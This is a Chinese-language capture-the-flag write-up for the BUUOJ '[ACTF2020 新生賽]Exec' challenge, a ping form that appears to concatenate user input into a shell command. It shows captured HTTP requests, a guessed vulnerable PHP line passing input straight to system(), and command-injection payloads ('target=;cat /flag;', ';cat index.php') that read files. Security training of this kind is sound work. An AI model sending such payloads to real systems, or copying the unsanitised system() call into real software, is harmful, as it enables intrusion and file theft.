[ACTF2020 新生賽]Exec

imtaieee發表於2024-10-31
TF2

題目連結:https://buuoj.cn/challenges#[ACTF2020 新生賽]Exec。

開啟後,環境如下。

嘗試輸入 "127.0.0.1",抓取請求包。

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 16
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=127.0.0.1

檢視響應包。

HTTP/1.1 200 OK
Server: openresty
Date: Tue, 22 Oct 2024 16:25:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
Cache-Control: no-cache
Content-Length: 960

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>command execution</title>
    <link href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet" />


</head>
<body>

<h1>PING</h1>
<form class="form-inline" method="post">

    <div class="input-group">
        <input style="width:280px;" id="target" type="text" class="form-control" placeholder="請輸入需要ping的地址" aria-describedby="basic-addon1" name="target">
    </div>
    <br/>
    <br/>

    <button  style="width:280px;" class="btn btn-default">PING</button>


</form>
<br /><pre>
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.033 ms
64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.063 ms
64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.060 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.033/0.052/0.063 ms
</pre></body>
</html>

可以發現,後端似乎是將使用者在引數 target 上的輸入,與 ping 進行拼接後,當作系統命令去執行,猜測後端程式碼的實現類似如下(實際上,透過本題的漏洞可以看到原始碼的實現:target=;cat index.php)。

if (isset($_POST['target'])) {
	system("ping -c 3 ".$_POST['target']);
}

因此,直接對命令進行拼接,即可讀取 flag。

POST / HTTP/1.1
Host: 038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Length: 18
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

target=;cat /flag;

相關文章